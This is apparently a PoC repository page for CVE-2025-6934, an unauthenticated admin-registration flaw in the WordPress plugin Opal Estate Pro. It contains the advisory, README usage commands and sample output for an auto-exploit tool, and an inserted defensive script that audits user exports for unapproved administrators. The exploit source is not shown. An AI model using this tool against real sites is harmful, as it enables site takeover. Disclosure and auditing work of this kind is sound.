CVE-2025-6934 PoC — Opal Estate Pro <= 1.7.5 - Unauthenticated Privilege Escalation via 'on_regiser_user'

Associated Vulnerability
Title: Opal Estate Pro <= 1.7.5 - Unauthenticated Privilege Escalation via 'on_regiser_user' (CVE-2025-6934)
Description: The Opal Estate Pro – Property Management and Submission plugin for WordPress, used by the FullHouse - Real Estate Responsive WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 1.7.5. This is due to a lack of role restriction during registration in the 'on_regiser_user' function. This makes it possible for unauthenticated attackers to arbitrarily choose the role, including the Administrator role, assigned when registering.
Description
CVE-2025-6934 - Exploit WordPress Opal Estate Pro 
Readme
# CVE-2025-6934 Auto Exploit

![Python](https://img.shields.io/badge/Python-3.11-blue)
![Status](https://img.shields.io/badge/Status-POC-orange)
![Author](https://img.shields.io/badge/Author-Rosemary1337-red)

---

## ⚡ Overview

This repository is a proof-of-concept (PoC) exploit for **CVE-2025-6934**, which affects the **WordPress plugin Opal Estate Pro ≤ 1.7.5**.  
This exploit demonstrates **unauthenticated administrator account creation**.

> **Disclaimer:** This PoC is for educational purposes only. Do **not** use on systems without permission.

---

## 🛠 Features

- Detect plugin version automatically.
- Retrieve required nonce for registration.
- Create a new administrator account without authentication.
- Colorful console output with status, success, failure, and info messages.
- Works on Python 3.x with minimal dependencies.

---

## ⚙️ Installation

1. Clone the repository:
```bash
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
```

2. Install dependencies:

```bash
pip install -r requirements.txt
```

> Requirements: `requests`, `beautifulsoup4`, `colorama`

---

## 🚀 Usage

```bash
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
```

### Example:

```bash
python3 main.py -u http://site.com/ -mail admin@horsefucker.org -password 3xplo1tI5Fun -user r1337
```

### Arguments

| Flag                       | Description            | Required | Default         |
| -------------------------- | ---------------------- | -------- | --------------- |
| `-u, --url`                | Target site URL        | Yes      | -               |
| `-mail, --newmail`         | Email for new admin    | Yes      | -               |
| `-password, --newpassword` | Password for new admin | Yes      | -               |
| `-user, --username`        | Username for new admin | No       | `administrator` |

---

## 🎨 Output

The console shows:

* Status messages `[•]`
* Success `[✔]`
* Fail `[✖]`
* Info `[i]`

Example:

```
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
    Username : r1337
    Email    : admin@horsefucker.org
    Password : 3xplo1tI5Fun
    Role     : administrator
```
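
The account reported in the output above is an ordinary WordPress user holding the `administrator` role, so a site that ran Opal Estate Pro ≤ 1.7.5 can be checked by reviewing who holds that role. The following is an added example, not part of this repository: it audits a user export (constructed sample, shaped like WP-CLI `wp user list --format=json` output) against an approved-administrator list. The function name `audit_admins`, the approved list and the cutoff date are assumptions.

```python
import json
from datetime import datetime

# Constructed sample, shaped like the output of the WP-CLI command
#   wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json
SAMPLE_EXPORT = json.dumps([
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.test",
     "user_registered": "2021-03-02 09:14:55", "roles": "administrator"},
    {"ID": 7, "user_login": "kim", "user_email": "kim@example.test",
     "user_registered": "2024-11-20 16:01:12", "roles": "editor"},
    {"ID": 9, "user_login": "oldadmin", "user_email": "old@example.test",
     "user_registered": "2022-06-11 08:30:00", "roles": "administrator"},
    {"ID": 42, "user_login": "newacct", "user_email": "new@example.test",
     "user_registered": "2025-07-03 02:47:31", "roles": "administrator"},
    {"ID": 43, "user_login": "helper", "user_email": "helper@example.test",
     "user_registered": "2025-07-03 02:49:10", "roles": "subscriber,administrator"},
    {"ID": 44, "user_login": "imported", "user_email": "imp@example.test",
     "user_registered": "0000-00-00 00:00:00", "roles": "administrator"},
])

PRIVILEGED_ROLES = {"administrator"}


def audit_admins(export_json, approved_logins, since=None):
    """Return privileged accounts that are not on the approved list.

    since: optional datetime; accounts registered before it are skipped.
    Accounts whose registration date cannot be parsed are always reported.
    """
    approved = {name.lower() for name in approved_logins}
    findings = []
    for user in json.loads(export_json):
        roles = {r.strip() for r in str(user.get("roles", "")).split(",")}
        if not roles & PRIVILEGED_ROLES or user["user_login"].lower() in approved:
            continue
        try:
            registered = datetime.strptime(user["user_registered"], "%Y-%m-%d %H:%M:%S")
        except ValueError:
            registered = None  # zero or malformed date: fail closed and report
        if since and registered and registered < since:
            continue
        findings.append({"id": int(user["ID"]), "login": user["user_login"],
                         "registered": user["user_registered"],
                         "date_ok": registered is not None})
    return sorted(findings, key=lambda f: f["registered"])


if __name__ == "__main__":
    for f in audit_admins(SAMPLE_EXPORT, {"siteowner"}, since=datetime(2025, 1, 1)):
        print(f)
```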
---

## 🔐 Security & Disclaimer

* For **educational & testing purposes only**.
* Do **not** attack websites without explicit permission.
* Use in a controlled lab or authorized penetration test only.

---

File Snapshot

```
[4.0K] /data/pocs/9147b2c237526b514ec366dc25bcd883ee444720
├── [1.0K] LICENSE
├── [8.7K] main.bin
├── [ 255] main.py
├── [3.2K] README.md
└── [ 33] requirements.txt

0 directories, 5 files
```